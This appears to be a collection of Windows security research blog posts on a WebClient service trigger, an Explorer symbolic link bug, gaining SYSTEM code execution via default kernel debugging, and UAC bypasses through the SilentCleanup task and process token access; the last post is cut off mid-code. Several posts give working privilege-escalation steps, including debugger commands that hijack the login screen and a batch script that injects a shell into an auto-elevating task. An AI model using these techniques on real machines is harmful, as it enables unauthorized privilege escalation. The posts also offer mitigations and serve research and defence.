I've been asked how you can start the WebClient service on Windows 7+ programmatically, specifically in relation to this issue. If you try and start it manually (say using the sc tool) as a normal user you'll find you get access denied. However the service is actually registered with a service trigger, so it'll be started automatically in response to a specific system event.

We can dump the trigger information for the service using the command sc qtriggerinfo WebClient which gives us:
START SERVICE
CUSTOM : 22b6d684-fa63-4578-87c9-effcbe6643c7 [ETW PROVIDER UUID]
This indicates that the service trigger is a custom ETW event trigger with the specified provider UUID. So all we need to do is write an event using that trigger as a normal user and we'll get the WebClient service to start. So something like:
#include <windows.h>
#include <evntprov.h>

bool StartWebClientService()
{
    // The custom trigger provider UUID from 'sc qtriggerinfo WebClient'.
    const GUID _MS_Windows_WebClntLookupServiceTrigger_Provider =
        { 0x22B6D684, 0xFA63, 0x4578,
        { 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7 } };
    REGHANDLE Handle;
    bool success = false;

    if (EventRegister(&_MS_Windows_WebClntLookupServiceTrigger_Provider,
        nullptr, nullptr, &Handle) == ERROR_SUCCESS)
    {
        EVENT_DESCRIPTOR desc;

        // Writing a single event from this provider is enough to fire the
        // service trigger and start WebClient.
        EventDescCreate(&desc, 1, 0, 0, 4, 0, 0, 0);

        success = EventWrite(Handle, &desc, 0, nullptr) == ERROR_SUCCESS;

        EventUnregister(Handle);
    }

    return success;
}
I haven't tested this from all locations but you can almost certainly cause this trigger to run even from a heavily restrictive sandbox such as Chrome or EPM.

Tracking Down the Root Cause of a Windows File Handling Bug

This blog post is about a bug in the Windows Explorer shell (useless from a security perspective I believe) that I thought I'd document. I'll explain the bug then go through how I tracked down the code responsible for the bug. Hopefully it serves as a brief tutorial on how you'd go about doing the same thing for other issues.

The Bug

The Windows Explorer shell has supported the concept of Shortcut files for as long as it's been around. These are your traditional LNK files. The underlying Windows operating system has no concept of these as being shortcuts to other files, it's all treated specially by Explorer. 

Since Vista the shell has supported another link format, NTFS symbolic links. You might think I'm slightly crazy at this point, surely symbolic links are just treated as any other file which happens to point to another file? While that would make more sense it seems that the developers of Explorer really did implement special support, and not only that, they got it wrong as we'll see with this bug.

NTFS Symbolic Links use the Reparse Point feature of NTFS to change a file or directory into a symbolic link which the kernel will follow when opening the file. Under the hood the data structure set in the Reparse Point looks like the following:

typedef struct _REPARSE_DATA_BUFFER {
    ULONG  ReparseTag;
    USHORT ReparseDataLength;
    USHORT Reserved;
    USHORT SubstituteNameOffset;
    USHORT SubstituteNameLength;
    USHORT PrintNameOffset;
    USHORT PrintNameLength;
    ULONG  Flags;
    WCHAR  PathBuffer[1];
} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;


This is a variable length structure and contains two strings, the Substitute Name and the Print Name. Why two names? Well the first is the native NT path which represents the target of the symbolic link; this will be something like \??\C:\TargetFile. The Print Name is normally set to what the user "thinks" the path is, so in this case C:\TargetFile. The rationale behind this is the NT name is ugly and somewhat unexpected for a user, so if a program has to show the target the Print Name shows what the user might expect. However there's no requirement for these two to match in any way. We can test this out using my Symbolic Link Testing Tools (available on Github here). The CreateNtfsSymbolicLink tool allows you to specify an arbitrary Print Name value (which the built-in MKLINK tool does not). Let's try it out (note you need to be an administrator):


Nothing too surprising, both links point to cmd.exe, but for the second one I've changed the Print Name to point to calc.exe instead. You can see the Print Names by just doing a directory listing. If you execute these files from the shell you'll find they both run cmd.exe as shown in the screenshot.
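If you want to dump the raw names yourself, here's a hedged C sketch built on the structure definition shown earlier (which you'd need to include, as it's not in the user-mode SDK headers; error handling omitted):

#include <windows.h>
#include <winioctl.h>
#include <stdio.h>

// Assumes the REPARSE_DATA_BUFFER definition from above is in scope.
int wmain(void)
{
    HANDLE h = CreateFileW(L"link2.exe", FILE_READ_EA, FILE_SHARE_READ,
        NULL, OPEN_EXISTING, FILE_FLAG_OPEN_REPARSE_POINT, NULL);
    BYTE buf[16 * 1024];
    DWORD ret;
    DeviceIoControl(h, FSCTL_GET_REPARSE_POINT, NULL, 0,
        buf, sizeof(buf), &ret, NULL);
    PREPARSE_DATA_BUFFER r = (PREPARSE_DATA_BUFFER)buf;
    // Offsets and lengths are byte counts relative to PathBuffer.
    wprintf(L"Substitute: %.*s\n", r->SubstituteNameLength / 2,
        r->PathBuffer + r->SubstituteNameOffset / 2);
    wprintf(L"Print:      %.*s\n", r->PrintNameLength / 2,
        r->PathBuffer + r->PrintNameOffset / 2);
    return 0;
}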

Now let's look at these files in the Explorer shell:

Hopefully you can immediately see the problem? And it's not just the icons: if you double click link1.exe in Explorer you get cmd.exe, while link2.exe instead runs calc.exe. Whoops. It's pretty clear that the shell must be explicitly handling NTFS symbolic links as if they are Shortcut files and then picking the Print Name over the actual target file in the link.

This feature does have some nice properties, for example the symbolic link can have any extension you like, so your link can have a .pdf extension but double clicking it will run cmd.exe (regardless of the extension you use). But then you could do that anyway with a LNK file as Explorer removes the .lnk extension. It might have been useful to attack a sandbox which calls ShellExecute on a file, but first checks the file name extension for allowed files. However as you need Administrator privileges to use this it's not especially useful in practice.

Tracking Down the Root Cause

Okay so we can guess what it's doing, at least let's track down the buggy code just to confirm it. We'd probably want to do this if we were sending an actual bug report to Microsoft (which I'm not of course, but they're more than welcome to fix a 9 year old bug if they like). Whenever I encounter a file based issue my go to is Process Monitor to find out the code responsible for handling the file contents.

To aid in this we need to configure Process Monitor to support symbol loading which you can do through the menu Options > Configure Symbols. If you go there you'll see the following dialog:

You'd assume that everything is already set-up for you, but if you try and get a stack trace from a monitored event you'll be disappointed. The version of the dbghelp library which ships with Windows (even Windows 10) doesn't support pulling symbols from a remote symbol server, so it's only useful for applications you've compiled yourself. We can remedy that though by installing WinDBG from the SDK or WDK and using its copy of dbghelp.dll. If you've installed the Windows 10 SDK then you'll find it under %PROGRAMFILES(x86)%\Windows Kits\10\Debuggers\x64 for 64 bit platforms. Select the DLL and you should be good to go.

So we can set a filter on link2.exe and see what's processing it. We're primarily looking for an event doing a FileSystemControl operation to read the Reparse Point data with FSCTL_GET_REPARSE_POINT.


Okay good the expected event is there, now if we open that event we can look at the stack tab see the culprit.


Well CShellLink::_LoadFromSymLink sounds very much like the culprit we're looking for, it's the last call before going into DeviceIoControl which ends up reading the Reparse Point information. Let's finally confirm by disassembling windows.storage.dll in your application of choice. If you use IDA Pro it should try and load the public symbol file using the DIA library. We end up with something which looks like:

HRESULT CShellLink::_LoadFromSymLink(LPCWSTR pszInputPath) {
    PREPARSE_DATA_BUFFER ReparseBuffer = // Allocate reparse buffer
    HANDLE hFile = CreateFileW(pszInputPath, FILE_READ_EA, ...,
        FILE_FLAG_OPEN_REPARSE_POINT);
    size_t PathLength = 0;
    offset_t PathOffset = NULL;
    WCHAR pszPath[MAX_PATH];
    if (hFile != INVALID_HANDLE_VALUE) {
        DeviceIoControl(hFile, FSCTL_GET_REPARSE_POINT, 0, 0, ReparseBuffer, ...);
        if (ReparseBuffer->ReparseTag == IO_REPARSE_TAG_SYMLINK) {
            PathLength = ReparseBuffer->PrintNameLength >> 1;
            PathOffset = (ReparseBuffer->PrintNameOffset >> 1) + 10;
        } else if (ReparseBuffer->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) {
            PathLength = ReparseBuffer->PrintNameLength >> 1;
            PathOffset = (ReparseBuffer->PrintNameOffset >> 1) + 8;
        } else {
            return E_FAIL;
        }
        StringCchCopyN(pszPath, MAX_PATH,
            (WCHAR*)ReparseBuffer + PathOffset, PathLength);
        _SetSimplePIDL(&pszPath);
        _ResetDirty();
    }
    return S_OK;
}

We can see the bug here pretty clearly, it's using the PrintName value. I guess it might be intentional as you can see this code also supports normal mount points and has the same issue. Fortunately for mount points there seems to be no way of directly tricking Explorer to parse the directory as anything else, but this might only trick another application which uses the ShellLink CoClass directly.

Anyway I hope this is useful as a very brief tutorial on how to find where vulnerable code lies in Windows, at least when dealing with files. It's a shame that this bug wasn't more serious, but fortunately the fact that Symbolic Links need administrator permissions might have worked in Microsoft's favour. 

Getting Code Execution on Windows by Abusing Default Kernel Debugging Setting

TL;DR; This blog post comes from an on-site pentest I did a long time ago. While waiting for some other testing to complete the customer was interested to see if I could get code execution on one of their Windows workstations (the reasons for this request are unimportant). Needless to say I had physical access to the workstation so it should be pretty simple thing to achieve. The solution I came up with abused the default Windows Kernel Debugging settings to get arbitrary code execution without needing to permanently modify the system configuration or open the case.

The advantage of this technique is it requires a minimum amount of kit which you could bring with you on a job, just in case. However it does require that the target has an enabled COM1 serial port which isn't necessarily guaranteed, and the machine cannot be using TPM enforced Bitlocker or similar.

And before anyone complains I'm fully aware that physical access typically means that you've already won, this is why I'm not claiming this is some sort of world ending vulnerability against Windows machines. It's not, but it's a common default configuration which administrators probably don't know to change. It also looks pretty awesome if the stars line up, let's face it, from a customer's perspective it makes you look like some bad-ass hacker. Bonus points for using the command line CDB instead of WinDBG ;-)

And just in case you misunderstand me:

THIS IS NOT A VULNERABILITY!!!!

With that said, let's look at it in more detail.

The Scenario

You find yourself in a room filled with Windows workstations (hopefully legally) and you're tasked with getting code execution on one of them. Your immediate thoughts to achieve this might be one or more of the following:

  • Change boot settings to boot off a CD/USB device and modify HDD
  • Crack open the case, pull the HDD, modify contents and put it back in.
  • Abuse Firewire DMA access to read/write memory.
  • Abuse the network connection coming out the back of the machine, either to try and PXE boot or MitM network/domain traffic on the machine.
Looking at the workstation while booting up, you notice that the boot order is configured to boot off the HDD first but a BIOS password prevents you circumventing it (assuming no bug in the BIOS). The case actually has a physical lock on it, probably something you could pick or crowbar open, but the customer probably wouldn't be amused if I left the workstation in bits. And finally the workstation didn't have Firewire or any external PCI bus to speak of to perform DMA attacks. I didn't test the network connection, but it might not be easy to PXE boot, and MitM'ing the traffic might encounter IPSec.

What these workstations did have though was a classic 9 pin serial port. This got me thinking, I knew that by default Windows configured kernel debugging on COM1, however kernel debugging isn't enabled. Was there a way of enabling kernel debugging on a system without having administrator login rights? Turns out that yes there is, so lets see how you could exploit this scenario.

Coming Prepared


Before you can exploit this feature you'll need a few things to hand:
  • A serial port on your test machine (this is pretty obvious of course). A USB to Serial adapter is sufficient with the right drivers.
  • A local installation of Windows. This is more for simplicity, perhaps there's tools to do Windows Kernel Debugging available these days for Linux/macOS which support everything you need but I doubt it.
  • Assuming you're using Windows an installation of Debugging Tools for Windows, specifically WinDBG.
  • A Null Modem cable, you'll need this to connect your test machine's serial port to the workstation serial port.
Now on your test machine ensure everything is installed and setup WinDBG to use your local COM port for kernel debugging. Using kernel debugging just requires you to open WinDBG then from the menu select File -> Kernel Debug or press CTRL + K. You should see a dialog which looks like the following:



Fill in the Port field to match the COM port your USB to Serial adapter was assigned. You shouldn't need to change the Baud Rate as the Windows default is 115200. You can verify this on another system using an administrator command prompt and running the command bcdedit /dbgsettings.



You could also do this via the following command line if you're so inclined: windbg -k com:port=COMX,baud=115200

Enabling Kernel Debugging on Windows 7

Enabling kernel debugging on Windows 7 is really easy (this should also work on Vista, but really who uses that anymore?). Reboot the workstation and after the BIOS POST screen has completed mash (the official technical term) the F8 key. If successful you'll be greeted with the following screen:


Scroll down with the cursor keys, select Debugging Mode and hit Enter. Windows should start to boot. Hopefully if you look at WinDBG you should now see the boot information being displayed (full disclosure, I'm doing this using a VM ;-)).



If this doesn't happen it's possible that the COM port's disabled, the kernel debugging configuration has changed or you've got a terrible USB to Serial adapter.

Enabling Kernel Debugging on Windows 8-10

So moving on to more modern versions of Windows, you can try the F8 trick again, but don't be shocked when it does NOTHING. This was an intentional change Microsoft made to the boot process in Windows 8. With the prevalence of SSDs and various changes to Windows' boot process there's no longer enough time (in their opinion) for mashing the F8 key. Instead, while the option to enable kernel debugging is still present, you need to configure it through the fancy UEFI-alike menus.

This presents us with a problem. We're assuming we don't have access to the BIOS (because of, say, a password) so it would seem we couldn't access the UEFI configuration options. The main way you can configure this is by going through the Settings app (at least on Windows 10) and choosing to restart into Advanced Startup mode, or by passing the /r /o options to shutdown at the command prompt.


None of these options are going to help us. Fortunately there's a "documented" alternative way: if you hold the Shift key when selecting Restart from the start menu it will also reboot into the advanced startup options mode. This doesn't immediately sound like it's going to help you any more than the other options if you've got to login. Fortunately on the login screen there's an option to reboot the workstation, and it just so happens that the Shift trick also works there. So go to the power options (on the lower right corner of the login screen on Windows 10), hold left Shift and click Restart. If successful you'll be greeted with the following screen.


 Click the highlighted "Troubleshoot" and you'll get to a new screen.


From here select "Advanced options", going to the *sigh* next screen:


At this screen you'll want to click "Startup Settings" which will bring you to the following screen. You might be inclined to think you could click "Command Prompt" to get a system command prompt, but that's going to require a password for a local administrator user anyway, and if you've got that already you don't need to do this. Also I'm not saying there aren't tricks you can play with recovery mode etc., I'm showing you this just for giggles :-)


After hitting "Restart" the workstation will reboot and you should be presented with the following:


Finally, you can hit F1 to enable kernel debugging. Phew... bring back F8. If all went according to plan you should see the boot messages again.


Getting Code Execution

You've now got a kernel debugger attached to the machine, the final step is to bypass the login screen. One common trick when using Firewire DMA attacks is to search for a particular pattern in memory which corresponds to LSASS's password check and kill it. Now any login password will work, this is fine but not very sneaky (for example you'd end up with event log entries showing the login). Plus you'd need to know an appropriate user account, it's possible the local Administrator account has been renamed.

Instead we'll do a more targeted attack which is possible because we've got the kernel's view of the system available, not a physical memory view. We'll abuse the fact that the login screen has a button for launching Accessibility tools, this will execute a new process on the login desktop as SYSTEM. We can hijack this process creation to spawn a command prompt and do whatever we like.



First things first we'll want to configure symbols for the machine we're trying to attack. Without symbols we can't enumerate the necessary kernel structures to find the bits of the system to attack. The simplest way to ensure symbols are configured correctly is to type the commands .symfix+ then .reload into the debugger command window. Now to test, issue the command !process 0 0 winlogon.exe which will find the process responsible for displaying the login window. If successful it should look something like the following:



The highlighted value is the kernel address of the EPROCESS structure. Copy that value now to get an "interactive" debugging session for that process using the command .process /i EPROCESS (substituting the copied address). Type g, then Enter (or hit F5) and you should see the following:



Now with this interactive session we can enumerate the user modules and load their symbols. Run the command .reload /user to do that. Then we can set a breakpoint on CreateProcessInternalW, which is what will be run whenever a new process is about to be created. Where this function lives depends on the Windows version: on Windows 7 it's in the kernel32 DLL, on Windows 8+ it's in the kernelbase DLL. So set the breakpoint using bp MODULE!CreateProcessInternalW, replacing MODULE with the name appropriate for your system.

With the breakpoint set, click the Ease of Access button on the login screen and hopefully the breakpoint should hit. Now just to be sure issue the commands r and k to dump the current registers and show a back trace. It should look something like the following:


We can see in the stack trace that we've got calls to things like WlAccessibilityStartShortcutTool which seem to be related to accessibility. Now CreateProcessInternalW takes many parameters, but the only one we're really interested in is the third parameter, which is a pointer to a NUL terminated command line string. We can modify this string to instead refer to the command prompt and we should get our desired code execution. First just to be sure we'll dump the string using the dU command: for x64 pass dU r8 (as the third parameter is stored in the r8 register), for x86 issue dU poi(@esp+c) (on 32 bit all parameters are passed on the stack). Hopefully you'll see the following:


So WinLogon is trying to create an instance of utilman.exe, that's good. Now this string must be writable (there's a dumb behaviour of CreateProcess that if it's not you'll get a crash) so we can just overwrite it. Issue the command ezu r8 "cmd" or ezu poi(@esp+c) "cmd" depending on your bitness and then type g and enter to continue. Bathe in your awesomeness.


Downsides

So there are a number of downsides to this technique:
  • The workstation MUST have a serial port on it, which isn't a given these days, and it must be configured as COM1.
  • The workstation must be rebooted, this means that you can't get access to any logged on user credentials or things left in memory. Another issue with this is if the workstation has a boot password you might not be able to reboot it anyway.
  • The configuration of the kernel debugging must be the default.
  • In the presence of TPM enforced Bitlocker you shouldn't be able to change the debugger configuration without also invalidating the boot measurement, meaning Bitlocker won't unlock the drive.
Still in the end the setup costs are so low, it wouldn't take much to carry a USB to Serial adapter and a Null Modem cable in your travel bag if you're going on site somewhere. 

Mitigations

It's all very well and good that you can do this, but is there any way to prevent it? Well of course as many will point out if you've already got physical access it's Game Over Man (R.I.P. Bill), but there are some configuration changes you can make to remove this attack vector:

  • Change the default debugging settings to Local kernel debugging. This is a mode which means only a local debugger running as administrator can debug the kernel (and debugging must also be on). You can change it at an administrator command prompt with the command bcdedit /dbgsettings LOCAL. You could almost certainly automate this across your estate with a login script or GPO option.
  • Don't buy Workstations with serial ports. Sounds dumb, and you probably have little choice but don't get things on your purchased devices which serve no useful purpose. Presumably some vendors still provide a configuration option for this.
  • If you do have serial ports disable them in the BIOS or, if you can't disable them outright change the default I/O port from 0x3F8. Legacy COM ports are not plug and play, Windows will use an explicit I/O port to talk to COM1, if your COM port isn't configured as COM1 Windows can't use it. This is also important if you've installed aftermarket COM port cards, while they tend not to be configured as COM1 they _could_ be.
  • Finally use Bitlocker with a TPM, this is a good idea regardless as it would also block someone being able to pull the HDD out and modify it offline (or just up and stealing the thing for the information on the disk). Bitlocker + TPM would prevent someone enabling debugging on a system without knowing the Bitlocker recovery key. At least on Windows 8+ entering the System Settings option requires changing the boot configuration temporarily, which will cause the TPM boot measurement to fail. I've not tested this on Windows 7 though, hitting F8 might not change the boot measurement as I believe that menu is in the winload.exe boot process, at that point Bitlocker's key has already been unsealed. If anyone has a Windows 7 machine with Bitlocker and TPM let me know the result of testing that :-)
Another interesting thing is the latest version of Windows 10 available when I'm writing this (1607, Anniversary Edition) now configures kernel debugging to Local only by default. However it's possible this isn't changed during upgrades so you'd still want to take a look.

Conclusions

So this is a fun, but not particularly serious issue if someone's got physical access to your machine and you've covered a number of the common attack vectors (like HDD access, BIOS, Firewire). Good advice is to treat physical access as a potential attack vector for external but also internal threats, and it pays to do everything you can to lock your estate down. You should also consider deploying Bitlocker even if the device isn't portable; it makes it more difficult to compromise a workstation through logical attacks on the boot process and also makes it harder for someone to extract sensitive data from a stolen machine.

Exploiting Environment Variables in Scheduled Tasks for UAC Bypass

The Windows Task Scheduler is a great place to go and find privilege escalations, it's typically abused to add SUID style capabilities to Windows in a nice easy to misunderstand package. It can execute programs as LocalSystem, it can auto-elevate applications for UAC, it can even host arbitrary COM objects. All in all it's a mess, which is why finding bugs in the scheduler itself or in the tasks isn't especially difficult. For example here's a few I've found before. This short blog is about a quick and dirty UAC bypass I discovered which works silently even when UAC is set to the highest prompt level and can be executed without dropping any files (other than a registry key) to disk.

Anyway I'm technically on a sabbatical from finding bugs in Microsoft products (best not ask why) so I'll keep this brief. However sometimes while I'm not looking you just sort of trip over a bug. I was poking around various scheduled tasks and noticed one which looked interesting, SilentCleanup. The reason this is interesting is that it's marked as auto-elevating (so will silently run code as UAC admin if the caller is a split-token administrator) and it can be manually started by a non-administrator user.

It turns out I'm not alone in noticing this is interesting, Matt Nelson already found a UAC bypass in this scheduled task but as far as can be determined it's already been fixed, so is there still a way of exploiting it? Let's dump some of the task's properties using Powershell to find out.


We can see the Principal property, which determines what account the task runs as, and the Actions property which determines what to run. In the Principal property we can see the Group to run as is Authenticated Users, which really means it will run as the logged-on user starting the task. We also see the RunLevel is set to Highest which means the Task Scheduler will try and elevate the task to administrator without any prompting. Now look at the actions: it's specifying a path, but notice something interesting? It's using an environment variable as part of the path, and in UAC scenarios these can be influenced by a normal user by writing to the registry key HKEY_CURRENT_USER\Environment and specifying a REG_SZ value.

So stop beating around the bush, let's try and exploit it. I dropped a simple executable to c:\dummy\system32\cleanmgr.exe, set the windir environment variable to c:\dummy, started the scheduled task and immediately got administrator privileges. So let's automate the process; I'll use everyone's favourite language, BATCH, as we can use the reg and schtasks commands to do all the work we need. Also as we don't want to drop a file to disk we can abuse the fact that the executable path isn't quoted by the Task Scheduler, meaning we can inject arbitrary command line arguments and just run a simple CMD shell.
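As a rough sketch, the manual version is just two commands (the task path here is the standard location for SilentCleanup, but verify it on your own system):

reg add HKCU\Environment /v windir /t REG_SZ /d "c:\dummy" /f
schtasks /Run /TN "\Microsoft\Windows\DiskCleanup\SilentCleanup" /I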

The BATCH file first sets the windir environment variable to "cmd /K" with a following script which deletes the original windir environment variable then uses REM to comment the rest of the line out. Executing this on Windows 10 Anniversary Edition and above as a split token admin will get you a shell running as an administrator. I've not tested it on any earlier versions of Windows so YMMV. I didn't send this to MSRC but through a friend confirmed that it should already be fixed in a coming version of RS3, so it really looks like MS are serious about trying to lock UAC back down, at least as far as it can be. If you want to mitigate now you should be able to reconfigure the task to not use environment variables using the following Powershell script run as administrator (doing this using the UAC bypass is left as an exercise for the reader).
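The original script isn't reproduced here, but based on that description a reconstruction would look something like this (hedged, treat it as a sketch):

@echo off
:: Point windir at a command line which tidies up the registry value and
:: then REMs out the rest of the task's original command line.
reg add HKCU\Environment /v windir /t REG_SZ ^
  /d "cmd /K reg delete HKCU\Environment /v windir /f && REM " /f
schtasks /Run /TN "\Microsoft\Windows\DiskCleanup\SilentCleanup" /I

Likewise the mitigation script wasn't preserved; a hedged equivalent using the ScheduledTasks module (the cleanmgr arguments are illustrative) replaces the action's environment variable with an explicit path:

$action = New-ScheduledTaskAction -Execute "$env:SystemRoot\system32\cleanmgr.exe" `
    -Argument "/autoclean /d %systemdrive%"
Set-ScheduledTask -TaskPath "\Microsoft\Windows\DiskCleanup\" `
    -TaskName "SilentCleanup" -Action $action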

If you want to find other potential candidates the following Powershell script will find all tasks with executable actions which will auto-elevate. On my system there are 4 separate tasks, but only one (the SilentCleanup task) can be executed as a normal user, so the rest are not exploitable. Good thing I guess.
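Again that script isn't reproduced above; a hedged equivalent using the ScheduledTasks module might be:

Get-ScheduledTask |
    Where-Object { $_.Principal.RunLevel -eq "Highest" } |
    Where-Object { $_.Actions | Where-Object { $_.Execute } } |
    Select-Object TaskPath, TaskName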

Reading Your Way Around UAC (Part 1)

I'm currently in the process of trying to do some improvements to the Chrome sandbox. As part of that I'm doing updates to my Sandbox Attack Surface Analysis Toolset as I want to measure whether what I'm doing to Chrome is having a tangible security benefit. Trouble is I keep walking into UAC bypasses while I'm there which is seriously messing up the flow. So in keeping with my previous blog post on a UAC bypass let me present another. As we go I'll show some demos using the latest version of my NtObjectManager Powershell module (so think of this blog as a plug for that as well, make sure you follow the install instructions on that link before running any of the scripts).

I don't recall ever seeing this issue documented (but I'm sure someone can tell me if it has been), however MS clearly know, as we'll see in a later part. Bear in mind this demonstrates just how broken UAC is in its default configuration. UAC doesn't really help you much even if you prevent the auto-elevation, as this technique works as long as there exists any elevated process in the same logon session. Let this be a PSA, one of many over the years, that split-token administrator in UAC just means MS get to annoy you with prompts unnecessarily while serving very little, if not zero, security benefit.

Before I start I have to address/rant about the "fileless" moniker which is bandied around for UAC bypasses. My previous blog post said it was a fileless bypass, but I still had to write to the registry (which is backed by a file) and of course some sort of executable still needs to be running (which is backed at some point by the page file) and so on. Basically all a fileless bypass means is that it doesn't rely on the old IFileOperation tricks to hijack a DLL. It doesn't mean that at no point will some file end up on disk somewhere; I suppose it's more a DFIR kind of term. Anyway, enough, on to technical content.

One Weird Design Decision

Oh to be a fly on the wall when Microsoft were designing UAC (or LUA as it was probably still known back then). Many different attack vectors were no doubt covered to reduce the chance of escalation from a normal user to administrator. For example Shatter Attacks (and general UI driving) were mitigated using UIPI. COM DLL planting was mitigated by making administrator processes only use HKLM for COM registrations (not especially successfully I might add). And abusing a user's resources was mitigated using Mandatory Integrity Labels to prevent write access from Low to High levels.

Perhaps there was a super secure version of UAC developed at one point, but the trouble is it would have probably been unusable. So no doubt many of the security ideas got relaxed. One of particular interest is that a non-administrator user can query some, admittedly limited, process information about administrator processes in the same desktop. This has surprising implications as we'll see.

So how much access do normal applications get? We can answer that pretty easily by running the following PS script as a normal split-token admin user.

Import-Module NtObjectManager

# Start mmc.exe and ensure it elevates (not really necessary for mmc)
Start-Process -Verb runas mmc.exe
Use-NtObject($ps = Get-NtProcess -Name mmc.exe) {
    $ps | Format-Table -Property ProcessId, Name, GrantedAccess
}

This should result in MMC elevating and the following printed to the PS console:

ProcessId Name    GrantedAccess
--------- ----    -------------
    17000 mmc.exe Terminate, QueryLimitedInformation, Synchronize

So it shows we've got 3 access rights, Terminate, QueryLimitedInformation and Synchronize. This kind of makes sense, after all it would be a pain if you couldn't kill processes on your desktop, or wait for them to finish, or get their name. It's at this point that the first UAC design decision comes into play, there exists a normal QueryInformation process access right, however there's a problem with using that access right, and that's down to the default Mandatory Label Policy (I'll refer to it just as IL Policy from now on) and how it's enforced on Processes.

The purpose of IL Policy is to specify which of the Generic Access Rights, Read, Write and Execute a low IL user can get on a resource. This is the maximum permitted access, the IL Policy doesn't itself grant any access rights. The user would still need to be granted the appropriate access rights in the DACL. So for example if the policy allows a lower IL process to get Read and Execute, but not Write (which is the default for most resources) then if the user asks for a Write access right the kernel access check will return Access Denied before even looking at the DACL. So let's look at the IL Policy and Generic Access Rights for a process object:

# Get current process' mandatory label
$sacl = $(Get-NtProcess -Current).SecurityDescriptor.Sacl
Write-Host "Policy is $([NtApiDotNet.MandatoryLabelPolicy]$sacl[0].Mask)"

# Get process type's GENERIC_MAPPING
$mapping = $(Get-NtType Process).GenericMapping
Write-Host "Read: $([NtApiDotNet.ProcessAccessRights]$mapping.GenericRead)"
Write-Host "Write: $([NtApiDotNet.ProcessAccessRights]$mapping.GenericWrite)"
Write-Host "Execute: $([NtApiDotNet.ProcessAccessRights]$mapping.GenericExecute)"

Which results in the following output:

Policy is NoWriteUp, NoReadUp
Read: VmRead, QueryInformation, ReadControl
Write: CreateThread, VmOperation, VmWrite, DupHandle, *Snip*
Execute: Terminate, QueryLimitedInformation, ReadControl, Synchronize

I've highlighted the important points. The default policy for Processes is to not allow a lower IL user to either Read or Write, so all they can have is Execute access which as we can see is what we have. However note that QueryInformation is a Read access right which would be blocked by the default IL Policy. The design decision was presumably thus, "We can't give read access, as we don't want lower IL users reading memory out of a privileged process. So let's create a new access right, QueryLimitedInformation which we'll assign to Execute and just transfer some information queries to that new right instead". Also worth noting on Vista and above you can't get QueryInformation access without also implicitly having QueryLimitedInformation so clearly MS thought enough to bodge that rather than anything else. (Thought for the reader: Why don't we get ReadControl access?)

Of course you still need to be granted those access rights in the DACL, so how come a privileged process grants them at all? The default security of a process comes from the Default DACL inside the access token which is used as the primary token for the new process. Let's dump the Default DACL using the following script inside a normal user PS console and an elevated PS console:

# Get process token.
Use-NtObject($token = Get-NtToken -Primary) {
    $token.DefaultDacl | Format-Table @{Label="User"; Expression={$_.Sid.Name}},
        @{Label="Mask"; Expression={[NtApiDotNet.GenericAccessRights]$_.Mask}}
}

The output as a normal user:

User                                     Mask
----                                     ----
domain\user                              GenericAll
NT AUTHORITY\SYSTEM                      GenericAll
NT AUTHORITY\LogonSessionId_0_295469990  GenericExecute, GenericRead

And again as the admin user:

User                                     Mask
----                                     ----
BUILTIN\Administrators                   GenericAll
NT AUTHORITY\SYSTEM                      GenericAll
NT AUTHORITY\LogonSessionId_0_295469990  GenericExecute, GenericRead

Once again the important points are highlighted, while the admin DACL doesn't allow the normal user access there is this curious LogonSessionId user which gets Read and Execute access. It would seem likely therefore that this must be what's giving us Execute access (as Read would be filtered by IL Policy). We can prove this just by dumping what groups a normal user has in their token:

Use-NtObject($token = Get-NtToken -Primary) {
    $token.Groups | Where-Object { $_.Sid.Name.Contains("LogonSessionId") } | Format-List
}

Name       : NT AUTHORITY\LogonSessionId_0_295469990
Sid        : S-1-5-5-0-295469990
Attributes : Mandatory, EnabledByDefault, Enabled, LogonId

Yup we have that group, and it's enabled. So that solves the mystery of why we get Execute access. This was a clear design decision on Microsoft's part to make it so a normal user could gain some level of access to an elevated process. Of course at this point you might be thinking so what? You can read some basic information from a process, how could being able to read be an issue? Well, let's see how dangerous this access is in Part 2.






Reading Your Way Around UAC (Part 2)

We left Part 1 with the knowledge that normal user processes in a split-token admin logon can get the Terminate, QueryLimitedInformation and Synchronize process access rights to elevated processes. This was due to the normal user and admin user having a Default DACL which grants Execute access to the current logon session SID, which is set for all tokens on the same desktop. The question we're left with is how can this possibly be used to elevate your privileges? Let's see how we can elevate our privileges prior to Windows 10.

Of the 3 access rights we have, both Terminate and Synchronize are really not that interesting. Sure you could be a dick to yourself I suppose and terminate your processes, but that doesn't seem much of interest. Instead it's QueryLimitedInformation which is likely to provide the most amusement, what information can we get with that access right? A quick hop, skip and jump to MSDN is in order. The following is from a page on Process Security and Access Rights:

PROCESS_QUERY_INFORMATION (0x0400)
Required to retrieve certain information about a process, such as its token, exit code, and priority class (see OpenProcessToken).

PROCESS_QUERY_LIMITED_INFORMATION (0x1000)
Required to retrieve certain information about a process (see GetExitCodeProcess, GetPriorityClass, IsProcessInJob, QueryFullProcessImageName). A handle that has the PROCESS_QUERY_INFORMATION access right is automatically granted PROCESS_QUERY_LIMITED_INFORMATION.
Windows Server 2003 and Windows XP:  This access right is not supported.

This at least confirms one thing from Part 1, that if you have QueryInformation access you automatically get QueryLimitedInformation as well. So it'd seem to make sense that QueryLimitedInformation just gives you a subset of what you could access from the full QueryInformation. And if this documentation is anything to go by all the things you could access are dull. But QueryInformation highlights something which would be very interesting to get hold of, the process token. We can double check I suppose, let's look at the documentation for OpenProcessToken to see what it says about required access.


ProcessHandle [in]
A handle to the process whose access token is opened. The process must have the PROCESS_QUERY_INFORMATION access permission.
Well that seals it, nothing to see here, move along. Wait, never believe anything you read. Perhaps this is really "Fake Documentation" (*topical* if you're reading this in 2020 from a nuclear fallout shelter just ignore it). Why don't we just try it and see (make sure your previously elevated copy of mmc.exe is still running):

Use-NtObject($ps = Get-NtProcess -Name mmc.exe) {
    Get-NtToken -Primary -Process $ps[0]
} | Format-List -Property User, TokenType, GrantedAccess, IntegrityLevel

And then where we might expect to see an error message we instead get:

User           : domain\user
TokenType      : Primary
GrantedAccess  : AssignPrimary, Duplicate, Impersonate, Query, QuerySource, ReadControl
IntegrityLevel : High

This shows we've opened the process' primary token and been granted a number of rights. To be sure, we print the IntegrityLevel property to prove it's really a privileged token (more or less, for reasons which will become clear).
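To see the same result from native code, here's a minimal Win32 sketch (hypothetical, error handling omitted; pid is assumed to be the PID of the elevated mmc.exe):

#include <windows.h>
#include <stdio.h>

// Minimal sketch: open the elevated process with only
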